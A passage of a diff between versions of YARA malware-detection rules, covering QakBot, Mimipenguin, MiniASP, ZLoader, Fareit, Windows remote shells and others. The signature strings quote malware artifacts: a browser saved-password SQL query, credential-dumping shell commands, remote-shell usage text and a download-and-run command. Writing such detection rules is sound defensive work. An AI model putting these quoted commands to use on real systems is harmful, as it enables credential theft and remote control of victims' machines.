+		$x1 = "Mozilla/4.0 (compatible; MSIE6.0;Windows NT 5.1)" fullword ascii
+		$x2 = "attrib -s -h -r c:\\ntldr" fullword ascii
+		$x3 = "%sWindows NT %d.%d" fullword ascii
+		$x4 = "Referer: http://%s/%s.aspx?n=" fullword ascii
+		$s1 = "\\cmd.exe /c \"systeminfo.exe >> " fullword ascii
+		$s2 = "%s\\cmd.exe /c %s >> \"%s\"" fullword ascii
+		$s3 = "shutdown.exe -r -t 0" fullword ascii
+		$s4 = "dir \"%SystemDrive%\\\" /s /a" fullword ascii
+		$s5 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;" fullword ascii
+		$s6 = "http_s.exe" fullword ascii
+		$s7 = "User Agent\\Post Platform\\" ascii
+		$s8 = "desktop.tmp" fullword ascii
+		$s9 = "\\support.icw" ascii
+		$s10 = "agc.tmp" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( pe.imphash ( ) == "57b6d88707d9cd1c87169076c24f962e" or 1 of them or for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "thawte SHA256 Code Signing CA" and pe.signatures [ i ] . serial == "0f:ff:e4:32:a5:3f:f0:3b:92:23:f8:8b:e1:b8:3d:9d" ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of ( $x* ) ) or 3 of them
 }
-rule SIGNATURE_BASE_APT_NK_Babyshark_Kimjoingrat_Apr19_1 : FILE
+rule SIGNATURE_BASE_MAL_Qakbotloader_Export_Section_Feb23 : FILE
 {
 	meta:
-		description = "Detects BabyShark KimJongRAT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c6bd1e1a-68f2-5a2d-a159-b16ea0d33987"
-		date = "2019-04-27"
+		description = "QakBot Export Selection"
+		author = "kevoreilly"
+		id = "cb86e9fb-a8d2-5285-aeda-622704399f8e"
+		date = "2023-02-17"
 		modified = "2023-12-05"
-		reference = "https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_babyshark.yar#L29-L53"
+		reference = "https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_qbot_feb23.yar#L22-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3fec0f21e299e09ae9734f256edbbca81a53f860b42e99a78b07d344552f1062"
+		hash = "6f99171c95a8ed5d056eeb9234dbbee123a6f95f481ad0e0a966abd2844f0e1a"
+		logic_hash = "0e40cd6acdbfb17670b414bd6f2ecdf1ae26ddd6a5d85931973b98963a43aba8"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712"
+		cape_options = "export=$export"
 
 	strings:
-		$x1 = "%s\\Microsoft\\ttmp.log" fullword wide
-		$a1 = "logins.json" fullword ascii
-		$s1 = "https://www.google.com/accounts/servicelogin" fullword ascii
-		$s2 = "https://login.yahoo.com/config/login" fullword ascii
-		$s3 = "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login" ascii
-		$s4 = "\\mozsqlite3.dll" ascii
-		$s5 = "SMTP Password" fullword ascii
-		$s6 = "Yandex\\YandexBrowser\\User Data\\Default\\Login Data" fullword ascii
+		$export = {55 8B EC 83 EC 50 (3A|66 3B) ?? 74}
+		$wind = {(66 3B|3A) ?? 74 [1-14] BB 69 04 00 00 53 E8 [5-7] 74}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or ( $a1 and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_CHAOS_Payload : FILE
+
+rule SIGNATURE_BASE_MAL_Devilstongue_Hijackdll : FILE
 {
 	meta:
-		description = "Detects a CHAOS back connect payload"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5057bc68-9bf8-54b4-88a1-d0c0cba62fa0"
-		date = "2017-07-15"
+		description = "Detects SOURGUM's DevilsTongue hijack DLL"
+		author = "Microsoft Threat Intelligence Center (MSTIC)"
+		id = "390b8b73-6740-513d-8c70-c9002be0ce69"
+		date = "2021-07-15"
 		modified = "2023-12-05"
-		reference = "https://github.com/tiagorlampert/CHAOS"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_chaos_payload.yar#L11-L26"
+		reference = "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_candiru.yar#L3-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ca409d3d0430fbc4c5ae52ce22616132da3a90c1ec3889571c6314e8787eee67"
+		logic_hash = "4ad58a77f9ab5fa078dc40f3ec1d0b0180f25ff3ea304a3c85889df29739e0f5"
 		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0962fcfcb1b52df148720c2112b036e75755f09279e3ebfce1636739af9b4448"
-		hash2 = "5c3553345f824b7b6de09ccb67d834e428b8df17443d98816471ca28f5a11424"
 
 	strings:
-		$x1 = { 2F 43 48 41 4F 53 00 02 73 79 6E 63 2F 61 74 6F 6D 69 63 }
+		$str1 = "windows.old\\windows" wide
+		$str2 = "NtQueryInformationThread"
+		$str3 = "dbgHelp.dll" wide
+		$str4 = "StackWalk64"
+		$str5 = "ConvertSidToStringSidW"
+		$str6 = "S-1-5-18" wide
+		$str7 = "SMNew.dll"
+		$code1 = { B8 FF 15 00 00 66 39 41 FA 74 06 80 79 FB E8 }
+		$code2 = { 44 8B C0 B8 B5 81 4E 1B 41 F7 E8 C1 FA 05 8B CA C1 E9 1F 03 D1 69 CA 2C 01 00 00 44 2B C1 45 85 C0 7E 19 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
+		filesize < 800KB and uint16( 0 ) == 0x5A4D and ( pe.characteristics & pe.DLL ) and ( 4 of them or ( $code1 and $code2 ) or pe.imphash ( ) == "9a964e810949704ff7b4a393d9adda60" )
 }
-rule SIGNATURE_BASE_Armitage_Msfconsole : FILE
+rule SIGNATURE_BASE_Exp_EPS_CVE20152545 : CVE_2015_2545 FILE
 {
 	meta:
-		description = "Detects Armitage component"
+		description = "Detects EPS Word Exploit CVE-2015-2545"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9c610cd0-663e-54ea-a0f2-6c044fc45d23"
-		date = "2017-12-24"
-		modified = "2022-08-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_armitage.yar#L14-L29"
+		id = "9a5f0554-b588-5b82-93df-0fdfba2af2da"
+		date = "2017-07-19"
+		modified = "2023-12-05"
+		reference = "Internal Research - ME"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2015_2545.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cf9df9858ca584288288fd0b55fdcf65aeea410f25531ee3d8cf48c30d23824a"
-		score = 75
+		logic_hash = "e1aac80a06dd71352d2776b4dfccce901d47363459853a37669af69be6e962c7"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "662ba75c7ed5ac55a898f480ed2555d47d127a2d96424324b02724b3b2c95b6a"
+		tags = "CVE-2015-2545, FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\umeterpreter\\u >" ascii
-		$s3 = "^meterpreter >" fullword ascii
-		$s11 = "\\umsf\\u>" ascii
+		$s1 = "word/media/image1.eps" ascii
+		$s2 = "-la;7(la+" ascii
 
 	condition:
-		filesize < 1KB and 2 of them
+		uint16( 0 ) == 0x4b50 and ( $s1 and #s2 > 20 )
 }
-rule SIGNATURE_BASE_Armitage_Meterpretersession_Strings : FILE
+rule SIGNATURE_BASE_APT_Malware_Commentcrew_Miniasp : FILE
 {
 	meta:
-		description = "Detects Armitage component"
+		description = "CommentCrew Malware MiniASP APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c49fdb73-1c95-5c63-b039-2fddb77290dc"
-		date = "2017-12-24"
+		id = "a434012d-d13a-5061-a1d8-180d2c5828e8"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_armitage.yar#L33-L50"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_miniasp.yar#L2-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3a21a42df8f15e3e81c797feb284edfe2de7d1c182547e8606f0e48dc08f6939"
+		logic_hash = "f382dd802f0332c99b1d33cf1dcd99ba7fad344a381152ebadfb69bc74c4e58f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b258b2f12f57ed05d8eafd29e9ecc126ae301ead9944a616b87c240bf1e71f9a"
-		hash2 = "144cb6b1cf52e60f16b45ddf1633132c75de393c2705773b9f67fce334a3c8b8"
+		super_rule = 1
+		hash0 = "0af4360a5ae54d789a8814bf7791d5c77136d625"
+		hash1 = "777bf8def279942a25750feffc11d8a36cc0acf9"
+		hash2 = "173f20b126cb57fc8ab04d01ae223071e2345f97"
 
 	strings:
-		$s1 = "session.meterpreter_read" fullword ascii
-		$s2 = "sniffer_dump" fullword ascii
-		$s3 = "keyscan_dump" fullword ascii
-		$s4 = "MeterpreterSession.java" fullword ascii
+		$x1 = "\\MiniAsp4\\Release\\MiniAsp.pdb" ascii
+		$x2 = "run http://%s/logo.png setup.exe" fullword ascii
+		$x3 = "d:\\command.txt" fullword ascii
+		$z1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR " ascii
+		$z2 = "Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)" fullword ascii
+		$z3 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC" ascii
+		$s1 = "http://%s/device_command.asp?device_id=%s&cv=%s&command=%s" fullword ascii
+		$s2 = "kill process error!" fullword ascii
+		$s3 = "kill process success!" fullword ascii
+		$s4 = "pickup command error!" fullword ascii
+		$s5 = "http://%s/record.asp?device_t=%s&key=%s&device_id=%s&cv=%s&result=%s" fullword ascii
+		$s6 = "no command" fullword ascii
+		$s7 = "software\\microsoft\\windows\\currentversion\\run" fullword ascii
+		$s8 = "command is null!" fullword ascii
+		$s9 = "pickup command Ok!" fullword ascii
+		$s10 = "http://%s/result_%s.htm" fullword ascii
 
 	condition:
-		filesize < 30KB and 1 of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) ) or ( all of ( $z* ) ) or ( 8 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Armitage_OSX : FILE
+rule SIGNATURE_BASE_MAL_DOC_Zloader_Oct20_1 : FILE
 {
 	meta:
-		description = "Detects Armitage component"
+		description = "Detects weaponized ZLoader documents"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e886e866-c163-56fb-9631-c586e9f23f9e"
-		date = "2017-12-24"
+		id = "34145746-9733-5dd9-9dcf-99e3a3ceee4f"
+		date = "2020-10-10"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_armitage.yar#L52-L68"
+		reference = "https://twitter.com/JohnLaTwC/status/1314602421977452544"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_zloader_maldocs.yar#L2-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "25c94b9715fdc10d0e04eea7d5b9974e60f3e248f51b80de80542b169996fc7a"
+		logic_hash = "6f546a860361d3caff99c282465dbbd1880460c7491a1b5ad065c1b5d91e5d49"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2680d9900a057d553fcb28d84cdc41c3fc18fd224a88a32ee14c9c1b501a86af"
-		hash2 = "b7b506f38d0553cd2beb4111c7ef383c821f04cee5169fed2ef5d869c9fbfab3"
+		hash1 = "668ca7ede54664360b0a44d5e19e76beb92c19659a8dec0e7085d05528df42b5"
+		hash2 = "a2ffabbb1b5a124f462a51fee41221081345ec084d768ffe1b1ef72d555eb0a0"
+		hash3 = "d268af19db475893a3d19f76be30bb063ab2ca188d1b5a70e51d260105b201da"
 
 	strings:
-		$x1 = "resources/covertvpn-injector.exe" fullword ascii
-		$s10 = "resources/browserpivot.x64.dll" fullword ascii
-		$s17 = "resources/msfrpcd_new.bat" fullword ascii
+		$sc1 = { 78 4E FC 04 AB 6B 17 E2 33 E3 49 62 50 69 BB 60
+               31 00 1E 00 02 4B BA E2 D8 E3 92 22 1E 69 96 20
+               98 }
+		$sc2 = { 6B 9E E2 36 E3 69 62 72 69 3A 60 55 6E }
+		$sc3 = { 3E 69 76 60 59 6E 34 FB 87 6B 75 }
 
 	condition:
-		filesize < 6000KB and 1 of them
+		uint16( 0 ) == 0xcfd0 and filesize < 40KB and filesize > 30KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Vulndriver_HP_Hardware_Diagnostics_Etdsupp_May23 : FILE
+rule SIGNATURE_BASE_APT_Nazar_Svchost_Commands
 {
 	meta:
-		description = "Detects vulnerable versions of the HP Hardware Diagnostics driver (etdsupp.sys) based on PE metadata info"
-		author = "X__Junior (Nextron Systems)"
-		id = "8f838e4f-3e3e-5131-9d67-e49f6848bb37"
-		date = "2023-05-12"
+		description = "Detects Nazar's svchost based on supported commands"
+		author = "Itay Cohen"
+		id = "3e02381d-de03-50c8-8bde-2974ee96b7c1"
+		date = "2020-04-26"
 		modified = "2023-12-05"
-		reference = "https://github.com/alfarom256/HPHardwareDiagnostics-PoC/tree/main/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/susp_vulndriver_hp_hardware_diagnostics_etdsupp_may23.yar#L1-L16"
+		reference = "https://www.epicturla.com/blog/the-lost-nazar"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nazar.yar#L1-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f744abb99c97d98e4cd08072a897107829d6d8481aee96c22443f626d00f4145"
-		logic_hash = "bb50f591e49b1b0b08ccbe4ca5cb3685d8f358e51e6d6f77677bc05701f6b301"
-		score = 65
-		quality = 60
-		tags = "FILE"
+		logic_hash = "c71e8a3b2d69c51ed3f822f62b90906fc0a21d32f1f1850cdef71c335964f9b1"
+		score = 75
+		quality = 85
+		tags = ""
+		hash1 = "2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6"
+		hash2 = "be624acab7dfe6282bbb32b41b10a98b6189ab3a8d9520e7447214a7e5c27728"
 
 	strings:
-		$s1 = {4f 00 72 00 69 00 67 00 69 00 6e 00 61 00 6c 00 46 00 69 00 6c 00 65 00 6e 00 61 00 6d 00 65 00 00 00 65 00 74 00 64 00 73 00 75 00 70 00 70 00 2e 00 73 00 79 00 73 00}
-		$s2 = "etdsupp.pdb"
-		$s3 = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}([\x00-\xff]{2}[\x00-\x11]\x00[\x00-\xff]{4}|\x00\x00\x12\x00\x00\x00\x00\x00)/
+		$str1 = { 33 31 34 00 36 36 36 00 33 31 33 00 }
+		$str2 = { 33 31 32 00 33 31 35 00 35 35 35 00 }
+		$str3 = { 39 39 39 00 35 39 39 00 34 39 39 00 }
+		$str4 = { 32 30 39 00 32 30 31 00 32 30 30 00 }
+		$str5 = { 31 39 39 00 31 31 39 00 31 38 39 00 31 33 39 00 33 31 31 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and int16 ( uint32( 0x3C ) + 0x5c ) == 0x0001 and filesize < 100KB and all of them
+		4 of them
 }
-rule SIGNATURE_BASE_Windowsshell_S3 : FILE
+rule SIGNATURE_BASE_Mimipenguin_SH
 {
 	meta:
-		description = "Detects simple Windows shell - file s3.exe"
+		description = "Detects Mimipenguin Password Extractor - Linux"
 		author = "Florian Roth (Nextron Systems)"
-		id = "064754a7-8639-5dbd-93f3-906662b8e9bc"
-		date = "2016-03-26"
+		id = "c670f6fe-562d-598f-a73f-45e4ab234f7d"
+		date = "2017-04-01"
 		modified = "2023-12-05"
-		reference = "https://github.com/odzhan/shells/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_winshells.yar#L10-L31"
+		reference = "https://github.com/huntergregal/mimipenguin"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimipenguin.yar#L8-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "344575a58db288c9b5dacc654abc36d38db2e645acff05e894ff51183c61357d"
-		logic_hash = "b9274f909b50247a4f5111a14806faadba7814e26805bef7d61eaaf8be4b46ed"
+		logic_hash = "5d9827e7adfe667a4a46e23854cac3b63949abcde5709045f0fe65e7b5704265"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "cmd                  - execute cmd.exe" fullword ascii
-		$s2 = "\\\\.\\pipe\\%08X" fullword ascii
-		$s3 = "get <remote> <local> - download file" fullword ascii
-		$s4 = "[ simple remote shell for windows v3" fullword ascii
-		$s5 = "REMOTE: CreateFile(\"%s\")" fullword ascii
-		$s6 = "put <local> <remote> - upload file" fullword ascii
-		$s7 = "term                 - terminate remote client" fullword ascii
-		$s8 = "[ downloading \"%s\" to \"%s\"" fullword ascii
-		$s9 = "-l           Listen for incoming connections" fullword ascii
+		$s1 = "$(echo $thishash | cut -d'$' -f 3)" ascii
+		$s2 = "ps -eo pid,command | sed -rn '/gnome\\-keyring\\-daemon/p' | awk" ascii
+		$s3 = "MimiPenguin Results:" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them ) or ( 5 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Windosshell_S1 : FILE
+rule SIGNATURE_BASE_Mimipenguin_1 : FILE
 {
 	meta:
-		description = "Detects simple Windows shell - file s1.exe"
+		description = "Detects Mimipenguin hack tool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b4e783a2-4a93-5c72-9b09-4692b383ac00"
-		date = "2016-03-26"
+		id = "62754337-52ef-5d3f-af2f-52f820ba0476"
+		date = "2017-07-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/odzhan/shells/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_winshells.yar#L33-L53"
+		reference = "https://github.com/huntergregal/mimipenguin"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimipenguin.yar#L34-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4a397497cfaf91e05a9b9d6fa6e335243cca3f175d5d81296b96c13c624818bd"
-		logic_hash = "29fcddc549c615ca5cdda60272926671bc1446c3c7b51c9a2fd867b6b68858b2"
+		logic_hash = "60a7b64eee9e2adfbc65fb5762f18e2abc4a35f9368ad704754870b5e8311391"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9e8d13fe27c93c7571075abf84a839fd1d31d8f2e3e48b3f4c6c13f7afcf8cbd"
 
 	strings:
-		$s1 = "[ executing cmd.exe" fullword ascii
-		$s2 = "[ simple remote shell for windows v1" fullword ascii
-		$s3 = "-p <number>  Port number to use (default is 443)" fullword ascii
-		$s4 = "usage: s1 <address> [options]" fullword ascii
-		$s5 = "[ waiting for connections on %s" fullword ascii
-		$s6 = "-l           Listen for incoming connections" fullword ascii
-		$s7 = "[ connection from %s" fullword ascii
-		$s8 = "[ %c%c requires parameter" fullword ascii
+		$x1 = "self._strings_dump += strings(dump_process(target_pid))" fullword ascii
+		$x2 = "def _dump_target_processes(self):" fullword ascii
+		$x3 = "self._target_processes = ['sshd:']" fullword ascii
+		$x4 = "GnomeKeyringPasswordFinder()" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them ) or ( 5 of them )
+		( uint16( 0 ) == 0x2123 and filesize < 20KB and 1 of them )
 }
-rule SIGNATURE_BASE_Windowsshell_S4 : FILE
+rule SIGNATURE_BASE_Mimipenguin_2 : FILE
 {
 	meta:
-		description = "Detects simple Windows shell - file s4.exe"
+		description = "Detects Mimipenguin hack tool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "838771dc-f885-5332-9813-2bc01af8e5fe"
-		date = "2016-03-26"
+		id = "b3bb1ba9-cbfc-53fd-81d0-256466ace4de"
+		date = "2017-07-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/odzhan/shells/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_winshells.yar#L55-L75"
+		reference = "https://github.com/huntergregal/mimipenguin"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimipenguin.yar#L52-L69"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f00a1af494067b275407c449b11dfcf5cb9b59a6fac685ebd3f0eb193337e1d6"
-		logic_hash = "fff280debdd32a736e37a73800f226bf6def5dd107abd1d9237d92904622c9ec"
+		logic_hash = "53a1f47ef9c94ef6bffbc9d7b9f3a8e0a7fb132c0936ea27e6be775cf99792a0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "453bffa90d99a820e4235de95ec3f7cc750539e4023f98ffc8858f9b3c15d89a"
 
 	strings:
-		$s1 = "cmd                  - execute cmd.exe" fullword ascii
-		$s2 = "\\\\.\\pipe\\%08X" fullword ascii
-		$s3 = "get <remote> <local> - download file" fullword ascii
-		$s4 = "[ simple remote shell for windows v4" fullword ascii
-		$s5 = "REMOTE: CreateFile(\"%s\")" fullword ascii
-		$s6 = "[ downloading \"%s\" to \"%s\"" fullword ascii
-		$s7 = "[ uploading \"%s\" to \"%s\"" fullword ascii
-		$s8 = "-l           Listen for incoming connections" fullword ascii
+		$x1 = "DUMP=$(strings \"/tmp/dump.${pid}\" | grep -E" fullword ascii
+		$x2 = "strings /tmp/apache* | grep -E '^Authorization: Basic.+=$'" fullword ascii
+		$x3 = "grep -E '^_pammodutil_getpwnam_root_1$' -B 5 -A" fullword ascii
+		$x4 = "strings \"/tmp/dump.${pid}\" | grep -E -m 1 '^\\$.\\$.+\\$')\"" fullword ascii
+		$x5 = "if [[ -n $(ps -eo pid,command | grep -v 'grep' | grep gnome-keyring) ]]; then" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 175KB and 2 of them ) or ( 5 of them )
+		( uint16( 0 ) == 0x2123 and filesize < 20KB and 1 of them )
 }
-rule SIGNATURE_BASE_Windowsshell_Gen : FILE
+rule SIGNATURE_BASE_Fareit_Trojan_Oct15 : FILE
 {
 	meta:
-		description = "Detects simple Windows shell - from files keygen.exe, s1.exe, s2.exe, s3.exe, s4.exe"
+		description = "Detects Fareit Trojan from Sep/Oct 2015 Wave"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6b871e8a-8fe3-5cc6-9f2c-ba2359861ea1"
-		date = "2016-03-26"
+		id = "725abb2a-7675-51b5-aed8-594e4826a6b4"
+		date = "2015-10-18"
 		modified = "2023-12-05"
-		reference = "https://github.com/odzhan/shells/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_winshells.yar#L79-L99"
+		reference = "http://goo.gl/5VYtlU"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fareit.yar#L8-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "753dd12f649bcbfcc2c60a2f3be27df5297a671a0ee1856093eed04113616581"
-		score = 75
+		logic_hash = "ef47e81483d5edf67d489a9a35ce56667e293350534e780d7d93b1fbc5f7113a"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash1 = "a7c3d85eabac01e7a7ec914477ea9f17e3020b3b2f8584a46a98eb6a2a7611c5"
-		hash2 = "4a397497cfaf91e05a9b9d6fa6e335243cca3f175d5d81296b96c13c624818bd"
-		hash3 = "df0693caae2e5914e63e9ee1a14c1e9506f13060faed67db5797c9e61f3907f0"
-		hash4 = "344575a58db288c9b5dacc654abc36d38db2e645acff05e894ff51183c61357d"
-		hash5 = "f00a1af494067b275407c449b11dfcf5cb9b59a6fac685ebd3f0eb193337e1d6"
+		hash1 = "230ca0beba8ae712cfe578d2b8ec9581ce149a62486bef209b04eb11d8c088c3"
+		hash2 = "3477d6bfd8313d37fedbd3d6ba74681dd7cb59040cabc2991655bdce95a2a997"
+		hash3 = "408fa0bd4d44de2940605986b554e8dab42f5d28a6a525b4bc41285e37ab488d"
+		hash4 = "76669cbe6a6aac4aa52dbe9d2e027ba184bf3f0b425f478e8c049637624b5dae"
+		hash5 = "9486b73eac92497e703615479d52c85cfb772b4ca6c846ef317729910e7c545f"
+		hash6 = "c3300c648aebac7bf1d90f58ea75660c78604410ca0fa705d3b8ec1e0a45cdd9"
+		hash7 = "ff83e9fcfdec4ffc748e0095391f84a8064ac958a274b9684a771058c04cb0fa"
 
 	strings:
-		$s0 = "[ %c%c requires parameter" fullword ascii
-		$s1 = "[ %s : %i" fullword ascii
-		$s2 = "[ %s : %s" fullword ascii
+		$s1 = "ebai.exe" fullword wide
+		$s2 = "Origina" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 175KB and 2 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and $s1 in ( 0 .. 30000 ) and $s2 in ( 0 .. 30000 )
 }
-rule SIGNATURE_BASE_Windowsshell_Gen2 : FILE
+rule SIGNATURE_BASE_NTLM_Dump_Output
 {
 	meta:
-		description = "Detects simple Windows shell - from files s3.exe, s4.exe"
+		description = "NTML Hash Dump output file - John/LC format"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8ed8443d-491b-5cb0-b12b-0d25267ba462"
-		date = "2016-03-26"
+		id = "d17ee473-317b-57d4-8ea8-7c89e8f2b2ed"
+		date = "2015-10-01"
 		modified = "2023-12-05"
-		reference = "https://github.com/odzhan/shells/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_winshells.yar#L101-L122"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_dumps.yar#L17-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c5ce27554b2ee25b974b567ef5a9ae877906250073da477f0ab5d71d162ac81a"
+		logic_hash = "154de926d27d38b38a4ed2c14b9122213fd1deb4115ef3bb77366db0818c7572"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "344575a58db288c9b5dacc654abc36d38db2e645acff05e894ff51183c61357d"
-		hash2 = "f00a1af494067b275407c449b11dfcf5cb9b59a6fac685ebd3f0eb193337e1d6"
 
 	strings:
-		$s1 = "cmd                  - execute cmd.exe" fullword ascii
-		$s2 = "get <remote> <local> - download file" fullword ascii
-		$s3 = "REMOTE: CreateFile(\"%s\")" fullword ascii
-		$s4 = "put <local> <remote> - upload file" fullword ascii
